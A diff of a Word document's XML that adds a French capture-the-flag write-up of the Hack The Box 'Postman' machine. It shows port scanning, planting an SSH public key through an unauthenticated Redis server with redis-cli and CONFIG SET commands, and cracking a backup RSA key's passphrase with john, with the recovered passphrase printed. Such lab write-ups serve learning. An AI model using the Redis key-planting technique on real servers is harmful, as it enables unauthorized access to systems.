--- a/[easy] Postman.docx
+++ b/[easy] Postman.docx
@@ -3,8 +3,48 @@
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
   <w:body>
     <w:p>
-      <w:r>
-        <w:t>[img]</w:t>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F6B0E91" wp14:editId="491ABDFF">
+            <wp:extent cx="5419725" cy="2962275"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="1" name="Image 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5419725" cy="2962275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -130,7 +170,97 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>[nmap]</w:t>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38C5307F" wp14:editId="11E7406F">
+            <wp:extent cx="5760720" cy="1998345"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="2" name="Image 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1998345"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Plusieurs ports sont ouverts :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>22 pour un serveur ssh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>80 pour un serveur web</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>6379 pour un serveur de données structurées</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>10000 pour un serveur web</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -173,9 +303,222 @@
         <w:t>Obtenir un accès utilisateur</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Bla</w:t>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Le port 6979 n’est pas commun </w:t>
+      </w:r>
+      <w:r>
+        <w:t>donc en faisant des recherches sur le service qui tourne derrière. Apparemment les versions entre Redis 4.0 et 5.0 sont vulnérables aux RCE. Un script redis-cli est disponible pour vérifier si la vulnérabilité est présente :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve">$ locate </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>red</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>is</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>-cli</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve">$ </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>usr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>/bin/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>redis</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>-cli -h 10.10.10.160</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A683EE0" wp14:editId="4C40F33D">
+            <wp:extent cx="4248150" cy="1552575"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="3" name="Image 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4248150" cy="1552575"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>170 lignes sont présentes sur l</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">a configuration. En regardant la configuration, nous </w:t>
+      </w:r>
+      <w:r>
+        <w:t>trouvons que le dossier par défaut est /var/lib/redis. Nous allons donc fouiller par là-bas :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53BE8F8A" wp14:editId="5095804B">
+            <wp:extent cx="5076825" cy="1714500"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="4" name="Image 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5076825" cy="1714500"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Il faut apparemment tester si chaque dossier existe en faisant une requête.. </w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/[easy] Postman.docx
+++ b/[easy] Postman.docx
@@ -336,27 +336,13 @@
               <w:rPr>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
-              <w:t xml:space="preserve">$ locate </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>$ locate red</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
-              <w:t>red</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-              <w:t>is</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-              <w:t>-cli</w:t>
+              <w:t>is-cli</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -375,35 +361,13 @@
               <w:rPr>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>/usr/bin/</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
-              <w:t>usr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-              <w:t>/bin/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-              <w:t>redis</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-              <w:t>-cli -h 10.10.10.160</w:t>
+              <w:t>redis-cli -h 10.10.10.160</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -518,7 +482,391 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Il faut apparemment tester si chaque dossier existe en faisant une requête.. </w:t>
+        <w:t>Il faut apparemment tester si chaque dossier existe en faisant une requête..</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Après des heures de tests, une personne du forum m’a aidé en donnant un indice, c’est par le ssh qu’on peut passer. Dans notre cas, aucun identifiant est dans les parages, donc nous allons déposer notre clé publique ssh dans la machine. D’abord nous créons un fichier txt avec notre clé publique dedans :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">$ (echo -e </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>"\n\n</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t> ; cat ~/.ssh/id_rsa.pub; echo</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -e </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>"\n\n</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:r>
+              <w:t>) &gt; key.txt</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>$ cat key.txt | redis-c</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>li -h 10.10.10.160 -x set ssh_key</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Maintenant nous sauvegardons la k</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ey dans /var/lib/redis/.ssh/authorized_keys :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Paragraphedeliste"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="2"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>GET ssh_key</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Paragraphedeliste"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="2"/>
+              </w:numPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>CONFIG SET dir /var/l</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>ib/redis/.ssh</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Paragraphedeliste"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="2"/>
+              </w:numPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>CONFIG SET dbfilename authorized_keys</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Paragraphedeliste"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="2"/>
+              </w:numPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Save</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Paragraphedeliste"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="2"/>
+              </w:numPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>exit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Nous pouvons alors nous c</w:t>
+      </w:r>
+      <w:r>
+        <w:t>onnecter en tant que redis. Mais le user.txt se situe dans le home de Matt, nous devons donc faire de l’énumération pour connaitre nos droits etc…</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Un fichier </w:t>
+      </w:r>
+      <w:r>
+        <w:t>id_rsa.bak est présent dans le dossier /opt</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Nous pouvons faire comme dans la box OpenNetAdmin, vu que nous avons une clé rsa, nous pouvons en extraire la passphrase (avec ssh2john et john) et se connecter en ssh :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B336B41" wp14:editId="59104149">
+            <wp:extent cx="5760720" cy="1552575"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="5" name="Image 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1552575"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Nous avons la passphrase : computer2008</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> . Nous pouvons alors nous connecter en ssh avec la clé et la passphrase</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> sauf que cela ne fonctionne pas :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A71A21E" wp14:editId="14651CC9">
+            <wp:extent cx="4200525" cy="904875"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="6" name="Image 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4200525" cy="904875"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Nous tentons alors via redis en local, en espérant que Matt ait le même mot de passe que celui en passphrase, et c’est un succès :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CED6AC5" wp14:editId="5B25BBDD">
+            <wp:extent cx="5010150" cy="847725"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="7" name="Image 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5010150" cy="847725"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -580,6 +928,118 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" 